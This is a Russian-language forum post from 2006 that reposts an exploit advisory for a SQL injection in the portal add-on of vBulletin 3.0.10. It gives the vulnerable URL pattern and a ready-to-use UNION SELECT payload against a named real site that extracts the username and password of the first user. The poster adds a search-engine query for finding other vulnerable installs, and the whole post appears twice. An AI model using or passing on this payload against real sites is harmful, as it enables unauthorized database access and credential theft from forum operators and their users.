pch
01.06.2006, 14:29
################################################## ####
# vBulletin 3.0.10 Version SQL Injection #
# SpC-x #
################################################## ####
# Credit : SpC-X #
# Site : http://www.Cyber-security.org #
################################################## ####
Code :
http://www.target.com/path/portal.php?id=54&a=viewfeature&featureid=[SQL]
Example :
http://ckknight.wowinterface.com/portal.php?id=54&a=viewfeature&featureid
=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,
password/**/from/**/user/**/where/**/userid=1/*
/SpC-x
Источник (http://www.security.nnov.ru/Mdocument919.html)
Других форумов с установленным порталом гугль не выдаёт (http://www.google.ru/search?hs=uqj&hl=rul&q=+vBulletin+3.0.10+inurl%3Aportal.php&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&).
PS Формально, уязвимость в портале, а не в форуме, поэтому заранее извиняюсь, если запостил не туда.
# vBulletin 3.0.10 Version SQL Injection #
# SpC-x #
################################################## ####
# Credit : SpC-X #
# Site : http://www.Cyber-security.org #
################################################## ####
Code :
http://www.target.com/path/portal.php?id=54&a=viewfeature&featureid=[SQL]
Example :
http://ckknight.wowinterface.com/portal.php?id=54&a=viewfeature&featureid
=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,
password/**/from/**/user/**/where/**/userid=1/*
/SpC-x
Источник (http://www.security.nnov.ru/Mdocument919.html)
Других форумов с установленным порталом гугль не выдаёт (http://www.google.ru/search?hs=uqj&hl=rul&q=+vBulletin+3.0.10+inurl%3Aportal.php&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&).
PS Формально, уязвимость в портале, а не в форуме, поэтому заранее извиняюсь, если запостил не туда.